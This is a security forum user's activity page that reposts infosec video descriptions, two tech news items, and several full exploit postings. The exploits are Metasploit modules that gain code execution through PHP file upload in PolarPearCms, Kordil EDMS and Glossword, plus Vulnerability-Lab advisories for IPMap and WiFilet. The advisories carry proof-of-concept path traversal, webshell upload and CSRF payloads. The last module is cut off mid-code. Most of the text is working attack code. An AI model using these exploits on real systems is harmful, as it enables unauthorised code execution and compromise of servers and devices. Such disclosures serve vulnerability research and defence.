Jump to content

Kwelwild

Active Members
 View Profile  See their activity

  • Posts

    638

  • Joined

  • Last visited

  • Days Won

    1

 Content Type 

Everything posted by Kwelwild

  1. Kwelwild
    Description: DDoS module of Exploitation Framework Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Owasp Xenotix Xss Exploit Framework: Ddoser
  2. Kwelwild
    Description: In this video I will show you how to recover data from hard disk image. In this video I will use foremost tool for data recovery this tool developed by the United States Air Force Office of Special Investigations and The Center for Information Systems Security Studies and Research . Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Web Application Scanning With Owasp Zap 2.0.0
  3. Kwelwild
    \ Description: Foremost is a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you can use command line switches to specify built-in file types. These built-in types look at the data structures of a given file format allowing for a more reliable and faster recovery. Foremost Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Foremost Forensic Data Recovery Tool
  4. Kwelwild
    Marissa Mayer, cea care conduce afacerile Yahoo, a emis un ordin care interzice angajatilor sa lucreze de acasa, orice urgenta urmand sa fie rezolvata din cel mai apropiat birou al companiei. Conform unei directive emise de biroul de resurse umane al Yahoo, urgentele putand fi rezolvate doar dintr-un sediu oficial al companiei. Prin noua "lege", Marissa Mayer doreste o mai buna interactiune intre angajati, tocmai de aceea "este vital ca toti angajatii sa fie in birouri atunci cand trebuie sa lucreze". Mayer, angajatul cu numarul 20 al companiei Google, a fost numita CEO al Yahoo dupa ce a lucrat 13 ani la compania fondata de Sergey Brin. Conducatoarea afacerilor uneia dintre cele mai vechi brand-uri din online face parte din "clubul exclusivist" al femeilor cu functii importante in acest domeniu, alaturi de Meg Whitman (Hewlett-Packard), Virginia Rometty (IBM) si Sheryl Sandberg (Facebook). Numarul angajatilor Yahoo a scazut de la 14.100 in 2011 la 11.500, nefiind exclusa o noua reducere cauzata de noua directiva. Biroul de presa din Marea Britanie al companiei a refuzat sa comenteze "chestiunile interne". Surs?: Noul sef Yahoo interzice lucrul de acasa dupa program din motive de securitate - www.yoda.ro
  5. Kwelwild
    'Copyright Alert System' rolls out to catch illegal downloaders The "Copyright Alert System," aka "six strikes," kicked off today with the cooperation of five major Internet service providers. The goal of the new campaign is to curb copyright infringement by going after consumers rather than pirates. While the CAS seems like something that would raise the hackles of privacy and civil liberty groups, the plan isn't to arrest, sue, or fine people downloading illegal movies, games, or music. Instead, the group managing the program -- the Center for Copyright Information -- says its objective is to "educate" such downloaders that they are infringing on protected intellectual copyrights. "Implementation marks the culmination of many months of work on this groundbreaking and collaborative effort to curb online piracy and promote the lawful use of digital music, movies and TV shows," executive director for the Center for Copyright Information Jill Lesser wrote in a blog post today. "The CAS marks a new way to reach consumers who may be engaging in peer-to-peer (P2P) piracy." The Center for Copyright Information is a joint venture between Hollywood copyright holders and ISPs -- it is also backed by the White House. AT&T, Cablevision, Verizon, Time Warner Cable, and Comcast are the participating ISP members in the venture. The CAS has been in the works since 2011 and was scheduled to go into effect last November. But after a series of delays, including reluctance from ISPs and effects of Hurricane Sandy, the Center for Copyright Information postponed its launch until this year. The ISP is then supposed to gradually ratcheting up the pressure on customers who ignore the warnings. Eventually, after six warnings, ISPs can choose to suspend service. Graduated response, however, does not include the termination of service. Customers wrongly accused can appeal to their company and take their case to an arbitration group for review. The plan doesn't protect Internet consumers from being sued by copyright owners, however. Some ways that pirated material is shared on the Internet, such as cyberlockers, e-mail attachments, and Dropbox folders, are not included under six strikes. Here's more on the CAS from Lesser's blog post: We hope this cooperative, multi-stakeholder approach will serve as a model for addressing important issues facing all who participate in the digital entertainment ecosystem. From content creators and owners to distributors to consumers, we all benefit from a better understanding of the choices available and the rights and responsibilities that come with using digital content, thereby helping to drive investment in content creation and innovative services that offer exciting ways to enjoy music, video and all digital content. Over the course of the next several days our participating ISPs will begin rolling out the system. Practically speaking, this means our content partners will begin sending notices of alleged P2P copyright infringement to ISPs, and the ISPs will begin forwarding those notices in the form of Copyright Alerts to consumers. Most consumers will never receive Alerts under the program. Consumers whose accounts have been used to share copyrighted content over P2P networks illegally (or without authority) will receive Alerts that are meant to educate rather than punish, and direct them to legal alternatives. And for those consumers who believe they received Alerts in error, an easy to use process will be in place for them to seek independent review of the Alerts they received. Surs?: 'Copyright Alert System' rolls out to catch illegal downloaders | Security & Privacy - CNET News
  6. Kwelwild
    PolarPearCms PHP File Upload Vulnerability ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'msf/core/exploit/php_exe' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'PolarPearCms PHP File Upload Vulnerability', 'Description' => %q{ This module exploits a file upload vulnerability found in PlarPear CMS By abusing the upload.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' => [ 'Fady Mohamed Osman' # @Fady_Osman ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-0803' ] ], 'Payload' => { 'BadChars' => "\x00", }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 21 2012')) register_options( [ OptString.new('TARGETURI', [true, 'The full URI path to Polarbearcms', '/polarbearcms']) , OptString.new('UPLOADDIR', [true, 'The directory to upload to starting from web root. This should be writable', '/polarbearcms']) ], self.class) end def check uri = target_uri.path res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'includes', 'jquery.uploadify', 'upload.php') }) if not res or res.code != 200 return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Appears end def exploit uri = target_uri.path upload_dir = normalize_uri("#{datastore['UPLOADDIR']}/") peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true) data = Rex::MIME::Message.new data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/',, nil, nil, "form-data; name=\"folder\"") post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') print_status("#{peer} - Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'includes', 'jquery.uploadify', "upload.php?folder=#{upload_dir}"), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) if not res or res.code != 200 fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") end upload_uri = "#{upload_dir}#{@payload_name}" print_status("#{peer} - Executing payload #{@payload_name}") res = send_request_raw({ 'uri' => upload_uri, 'method' => 'GET' }) end end Surs?: PolarPearCms PHP File Upload Vulnerability
  7. Kwelwild
    IPMap v2.5 iPad iPhone - Arbitrary File Upload Title: ====== IPMap v2.5 iPad iPhone - Arbitrary File Upload Web Vulnerabilities Date: ===== 2013-02-18 References: =========== http://www.vulnerability-lab.com/get_content.php?id=866 VL-ID: ===== 866 Common Vulnerability Scoring System: ==================================== 6.3 Introduction: ============= IPMap - IP Address Lookup Details & HTTP Wireless File Sharing with latest WorldWide IP database & FREE Monthly update. Accuracy: Over 99.8% on a country level and 83% on a city level for the US within a 25 mile radius. Features: Auto Detect & Lookup Your Real IP address IP address Hostname IP address Country Code ... ... ... IP address Area Code IP location Map HTTP Wireless File Sharing iTunes File Sync Web Upload File Support Customizable Background from your Photos Album (Copy of the Homepage: https://itunes.apple.com/us/app/ipmap-ip-address-lookup-details/id416041538 ) Abstract: ========= The Vulnerability Laboratory Research Team discovered an arbitrary file upload vulnerability in the mobile IPMap v2.5 app for the apple ipad & iphone. Report-Timeline: ================ 2013-02-18: Public Disclosure Status: ======== Published Affected Products: ================== Apple AppStore Product: IPMap - iPad iPhone 2.5 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== A local file include and arbitrary file upload web vulnerability via POST request method is detected in the mobile IPMap v2.5 app for the apple ipad & iphone. The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files. 1.1 The main vulnerbility is located in the upload file script of the webserver (http://192.168.0.10:6123/) when processing to load a manipulated filename via POST request method. The execution of the injected path or file request will occur when the attacker is watching the file index listing of the wifi web application web-server. 1.2 Remote attackers can also unauthorized implement mobile webshells by using multiple file extensions (pentest.php.js.gif) when processing to upload (submit) via POST request method. The attacker uploads a file with a double extension or multiple extensions and access the file in the secound step via directory webserver dir listing to compromise the apple iphone or ipad. Exploitation of the local file include web vulnerability does not require user interaction and also no privileged user account. Successful exploitation of the web vulnerabilities results in app/service manipulation and ipad or iphone compromise via file include or unauthorized file (webshell) upload attacks. Vulnerable Application(s): [+] WiFilet v1.2 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload via Submit (Web Server) [Remote] Vulnerable Parameter(s): [+] file > filename Affected Module(s): [+] File Dir Index - Listing Proof of Concept: ================= Both vulnerabilities can be exploited by remote attackers without privileged application user account and also without required user interaction. For demonstration or reproduce ... 1.1 PoC: (POST) -----------------------------307341202725627 Content-Disposition: form-data; name="file"; filename="../../../../cmd>home>tmp%00<'.png" Content-Type: image/png ???? Review: File Dir Listing <html><head> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>IPMap</title> <style>body { background-color:#f0f7fd; font-family:Tahoma,Arial,Helvetica,sans-serif; font-size:18x; padding:15px; margin-left:15%; margin-right:15%; } </style></head><body> <h2 style="background-color:#6897ff; margin:0; color:#fff; padding:5px 10px; border: 1px outset #aaa;border-bottom: 0px;">IPMap</h2> <h4 style="background-color:#6897ff;margin:0; color:#fff; padding:0px 10px 8px 10px; border: 1px outset #aaa; border-top: 0px;"> The following files are hosted live from the iPhone's Docs folder.</h4><p><table style="text-align:center; border-color:#9bc0d2; background:#f0f7fd; color:#4e697a; margin:0 auto;" border="1" cellpadding="0" cellspacing="0"><tbody><tr height="30"><td width="400"> <strong>File Name</strong></td><td width="400"><strong>File Info</strong></td></tr><tr height="30"> <td><a href="http://192.168.0.10:6123/../../../../cmd>home>tmp%00<'">%20%20%20%20&"><iframe src="../../../../cmd>home>tmp%00<'">%20%20%20%20&"> %20%20%20%20</a></td><td>(27.3 Kb, 2013-02-07 07:00:31 +0000)</td></tr></table></p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><table border="0" cellpadding="0" cellspacing="0" style="text-align:center; margin:0 auto;"><tr height="50"><td width="400"><label>upload file<input type="file" name="file" id="file" /></label></td><td width="400"><label><input type="submit" name="button" id="button" value="Submit" /> <font size="-1">* Please do NOT upload index.htm or index.html</font></label></td></tr></table></form></body></html> </iframe></a></td></tr></tbody></table></p></body></html> 1.2 PoC: (POST) -----------------------------307341202725627 Content-Disposition: form-data; name="file"; filename="pentest.php.js.html.htm.xml.png" Content-Type: image/gif Reference(s): http://192.168.0.10:6123/ Risk: ===== The security risk of the arbitrary file upload web vulnerability via POST request method is estimated as critical. Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright ? 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Surs?: IPMap v2.5 iPad iPhone - Arbitrary File Upload
  8. Kwelwild
    WiFilet v1.2 iPad iPhone - Multiple Vulnerabilities Title: ====== WiFilet v1.2 iPad iPhone - Multiple Web Vulnerabilities Date: ===== 2013-02-22 References: =========== http://www.vulnerability-lab.com/get_content.php?id=867 VL-ID: ===== 867 Common Vulnerability Scoring System: ==================================== 6.3 Introduction: ============= WiFilet will makes your iPhone/iPad a mobile disk,you can use browsers upload or download files between iPhone/iPad and PC through WIFI. * Easily sync musics between computers and play them directly. * Easily browse photo libraries via a web browser. * Simple & handy UI * Progress of the uploading files * Open files(like images,word,excel,ppt etc.) directly in your device * Share files by Email attachment * Password protection * ... (Copy of the Homepage: https://itunes.apple.com/de/app/wifilet/id492512158 ) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the mobile WiFilet v1.2 app for the apple ipad & iphone. Report-Timeline: ================ 2013-02-22: Public Disclosure Status: ======== Published Affected Products: ================== Apple AppStore Product: WiFilet (WiFi) Application (iPad & iPhone) 1.2 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== A local file include and arbitrary file upload web vulnerability via POST request method is detected in the mobile WiFilet v1.2 app for the apple ipad & iphone. The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files. 1.1 The main vulnerbility is located in the upload file script of the webserver (http://192.168.0.10:9999/) when processing to load a manipulated filename via POST request method. The execution of the injected path or file request will occur when the attacker is watching the file index listing of the wifi web application web-server. 1.1.2 Remote attackers can also unauthorized implement mobile webshells by using multiple file extensions (pentest.php.js.gif) when processing to upload (submit) via POST request method. The attacker uploads a file with a double extension and access the file in the secound step via directory webserver dir listing to compromise the apple iphone or ipad. Exploitation of the local file include web vulnerability does not require user interaction and also no privileged user account. Successful exploitation of the web vulnerabilities results in app/service manipulation and ipad or iphone compromise via file include or unauthorized file (webshell) upload attacks. Vulnerable Application(s): [+] WiFilet v1.2 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload via Submit (Web Server) [Remote] Vulnerable Parameter(s): [+] file > filename Affected Module(s): [+] File Dir Index - Listing 1.2 A cross site request forgery web vulnerability is detected in the mobile WiFilet v1.2 app for the apple ipad & iphone. The vulnerability allows remote attackers to form manipulated links or scripts to execute application functions when processing to load client side requests in the web browser. The vulnerability is located in the application delete module and the not secure parsed file parameter. Remote attacker can force application users with not expired session to execute application function when processing to click a manipulated link. Exploitation of the vulnerability requires medium or high user interaction without privileged application user account. Successful exploitation of the vulnerability result in account steal via client side session hijacking, client site phishing, or client-side content request manipulation. Vulnerable Application(s): [+] WiFilet v1.2 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Delete Vulnerable Module(s): [+] file Affected Module(s): [+] File Dir - Listing Proof of Concept: ================= Both vulnerabilities can be exploited by remote attackers without privileged application user account and also without required user interaction. For demonstration or reproduce ... 1.1 Local File/Path Include Web Vulnerability Review: Index Listing <tr><td title="../[FILE OR PATH REQUEST]<.png"><img src="/img/ext/png.png" align="absmiddle"> <a href="/down?f=6">../[FILE OR PATH REQUEST].png</a></td><td style="text-align:center;">2013-02-10 18:46</td> <td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td><td style="text-align:center;"> <button class="btn btn-danger" onclick="deleteFile("6")">Delete</button></td></tr> PoC: --- Session Log --- [{"bytes":233966,"id":7,"name":"8765434.png","createDate":"2013-02-10 18:46","ext":"png","typeDesc":"file_type_png","size":"228,48 KB"},{"bytes":27920,"id":6,"name":"../[FILE OR PATH REQUEST].png","createDate":"2013-02-10 18:46","ext":"png","typeDesc":"file_type_png","size":"27,27 KB"},{"bytes":27920,"id":5,"name":"327.png","createDate":"2013-02-06 18:02","ext":"png","typeDesc":"file_type_png","size":"27,27 KB"},{"bytes":27920,"id":4,"name":"327.png","createDate":"2013-02-06 18:02","ext":"png","typeDesc":"file_type_png","size":"27,27 KB"}] ... or http://192.168.0.10:9999/photo?u=../[FILE OR PATH REQUEST]< Reference(s): http://192.168.0.10:9999/ http://192.168.0.10:9999/list?p=&t=1360518361029 1.1.2 Local File Upload Web Vulnerability Review: Index Listing <tbody> <tr><td title="../[FILENAME+MULTIPLE EXTENSIONS].png.txt.iso.php.asp"><img src="/img/ext/file.png" align="absmiddle"> <a href="/../[FILENAME+MULTIPLE EXTENSIONS].png.txt.iso.php.asp">../[FILENAME+MULTIPLE EXTENSIONS].png.txt.iso.php.asp</a></td> <td style="text-align:center;">2013-02-10 18:53</td><td>File</td><td><div title="98139" align="right">95,84 KB</div></td> <td style="text-align:center;"><button class="btn btn-danger" onclick="deleteFile("8")">Delete</button></td></tr> <tr><td title="8765434.png"><img src="/img/ext/png.png" align="absmiddle"> <a href="/down?f=7">8765434.png</a></td> <td style="text-align:center;">2013-02-10 18:46</td><td>PNG Image</td><td><div title="233966" align="right">228,48 KB</div></td> <td style="text-align:center;"><button class="btn btn-danger" onclick="deleteFile("7")">Delete</button></td></tr><tr><td title="327.png"> <img src="/img/ext/png.png" align="absmiddle"> <a href="/down?f=6">327.png</a></td><td style="text-align:center;"> 2013-02-10 18:46</td><td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td><td style="text-align:center;"> <button class="btn btn-danger" onclick="deleteFile("6")">Delete</button></td></tr><tr><td title="327.png"> <img src="/img/ext/png.png" align="absmiddle"> <a href="/down?f=5">327.png</a></td><td style="text-align:center;"> 2013-02-06 18:02</td><td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td><td style="text-align:center;"> <button class="btn btn-danger" onclick="deleteFile("5")">Delete</button></td></tr><tr><td title="327.png"> <img src="/img/ext/png.png" align="absmiddle"> <a href="/down?f=4">327.png</a></td><td style="text-align:center;"> 2013-02-06 18:02</td><td>PNG Image</td><td><div title="27920" align="right">27,27 KB</div></td><td style="text-align:center;"> <button class="btn btn-danger" onclick="deleteFile("4")">Delete</button></td></tr> </tbody> Reference(s): http://192.168.0.10:9999/ 1.2 The client side cross site request forgery web vulnerability can be exploited by remote attackers without application user account and with medium or high required user interaction. For demonstration or reproduce ... <html> <head><body> <title>POC CSRF - Delete Files Exploit</title> <Referer=http://192.168.0.10:9999/delete?f=9> <Referer=http://192.168.0.10:9999/delete?f=9> <Referer=http://http://192.168.0.10:9999/delete?f=1> <Referer=http://http://192.168.0.10:9999/delete?f=2> <Referer=http://http://192.168.0.10:9999/delete?f=3> <Referer=http://http://192.168.0.10:9999/delete?f=4> <Referer=http://http://192.168.0.10:9999/delete?f=5> <Referer=http://http://192.168.0.10:9999/delete?f=6> <Referer=http://http://192.168.0.10:9999/delete?f=7> <Referer=http://http://192.168.0.10:9999/delete?f=8> <Referer=http://http://192.168.0.10:9999/delete?f=9> <Referer=http://http://192.168.0.10:9999/delete?f=10> </body></head> </html> Risk: ===== 1.1 The security risk of local path/file include web vulnerability via POST request method is estimated as critical. 1.1.2 The security risk of the arbitrary file upload web vulnerability via POST request method is estimated as high(+). 1.2 The security risk of the cross site request forgery web vulnerability via POST request method is estimated as low(+). Credits: ======== Vulnerability Laboratory [Research Team] - Chokri Ben Achour (meister@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Surs?: WiFilet v1.2 iPad iPhone - Multiple Vulnerabilities
  9. Kwelwild
    Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability", 'Description' => %q{ This module exploits a vulnerability in Kordil EDMS v2.2.60rc3. This application has an upload feature that allows an unauthenticated user to upload arbitrary files to the '/kordil_edms/userpictures/' directory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit ], 'References' => [ #['OSVDB', ''], #['EDB', ''], ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ ['Automatic Targeting', { 'auto' => true }] ], 'Privileged' => false, 'DisclosureDate' => "Feb 22 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to the web application', '/kordil_edms/']), ], self.class) end def check base = target_uri.path peer = "#{rhost}:#{rport}" # retrieve software version from login page begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, 'global_group_login.php') }) if res and res.code == 200 if res.body =~ /<center><font face="Arial" size="2">Kordil EDMS v2\.2\.60/ return Exploit::CheckCode::Vulnerable elsif res.body =~ /Kordil EDMS v/ return Exploit::CheckCode::Detected end end return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_error("#{peer} - Connection failed") end return Exploit::CheckCode::Unknown end def upload(base, file) data = Rex::MIME::Message.new data.add_part(file, 'text/x-php', nil, "form-data; name=\"upload_fd31\"; filename=\"#{@fname}.php\"") data.add_part("#{@fname}", nil, nil, 'form-data; name="add_fd0"') data.add_part("#{@fname}", nil, nil, 'form-data; name="add_fd27"') data.add_part("n", nil, nil, 'form-data; name="act"') data_post = data.to_s data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(base, 'users_add.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data_post }) return res end def on_new_session(client) if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.fs.file.rm("#{@fname}.php") else client.shell_command_token("rm #{@fname}.php") end end def exploit base = target_uri.path @peer = "#{rhost}:#{rport}" @fname = rand_text_numeric(7) # upload PHP payload to userpictures/[fname].php print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, php) if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/ print_good("#{@peer} - File uploaded successfully") else fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end # retrieve and execute PHP payload print_status("#{@peer} - Executing payload (userpictures/#{@fname}.php)") begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(base, 'userpictures', "#{@fname}.php") }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end end end Surs?: Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability
  10. Kwelwild
    Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability", 'Description' => %q{ This module exploits a file upload vulnerability in Glossword versions 1.8.8 to 1.8.12 when run as a standalone application. This application has an upload feature that allows an authenticated user with administrator roles to upload arbitrary files to the 'gw_temp/a/' directory. }, 'License' => MSF_LICENSE, 'Author' => [ 'AkaStep', # Discovery 'Brendan Coles <bcoles[at]gmail.com>' # metasploit exploit ], 'References' => [ [ 'EDB', '24456' ], [ 'OSVDB' '89960' ] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Automatic Targeting', { 'auto' => true }]], 'Privileged' => true, 'DisclosureDate' => "Feb 05 2013", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to the web application', '/glossword/1.8/']), OptString.new('USERNAME', [true, 'The username for Glossword', 'admin']), OptString.new('PASSWORD', [true, 'The password for Glossword', 'admin']) ], self.class) end def check base = target_uri.path peer = "#{rhost}:#{rport}" user = datastore['USERNAME'] pass = datastore['PASSWORD'] # login print_status("#{peer} - Authenticating as user '#{user}'") begin res = login(base, user, pass) if res if res.code == 200 print_error("#{peer} - Authentication failed") return Exploit::CheckCode::Unknown elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ print_good("#{peer} - Authenticated successfully") return Exploit::CheckCode::Appears end end return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_error("#{peer} - Connection failed") end return Exploit::CheckCode::Unknown end def on_new_session(client) if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") client.fs.file.rm("#{@fname}") else client.shell_command_token("rm #{@fname}") end end def upload(base, sid, fname, file) user = datastore['USERNAME'] pass = datastore['PASSWORD'] data = Rex::MIME::Message.new data.add_part(file, 'application/x-php', nil, "form-data; name=\"file_location\"; filename=\"#{fname}\"") data.add_part("edit-own", nil, nil, 'form-data; name="a"') data.add_part("users", nil, nil, 'form-data; name="t"') data.add_part("Save", nil, nil, 'form-data; name="post"') data.add_part("#{sid}", nil, nil, 'form-data; name="sid"') data.add_part("#{user}", nil, nil, 'form-data; name="arPost[login]"') data.add_part("#{pass}", nil, nil, 'form-data; name="arPost[pass_new]"') data.add_part("#{pass}", nil, nil, 'form-data; name="arPost[pass_confirm]"') data_post = data.to_s data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(base, 'gw_admin.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data_post, }) return res end def login(base, user, pass) res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(base, 'gw_login.php'), 'data' => "arPost%5Buser_name%5D=#{user}&arPost%5Buser_pass%5D=#{pass}&arPost%5Blocale_name%5D=en-utf8&a=login&sid=&post=Enter" }) return res end def exploit base = target_uri.path @peer = "#{rhost}:#{rport}" @fname= rand_text_alphanumeric(rand(10)+6) + '.php' user = datastore['USERNAME'] pass = datastore['PASSWORD'] # login; get session id and token print_status("#{@peer} - Authenticating as user '#{user}'") res = login(base, user, pass) if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ token = "#{$1}" sid = "#{$2}" print_good("#{@peer} - Authenticated successfully") else fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed") end # upload PHP payload print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") php = %Q|<?php #{payload.encoded} ?>| begin res = upload(base, sid, @fname, php) if res and res.code == 301 and res['location'] =~ /Setting saved/ print_good("#{@peer} - File uploaded successfully") else 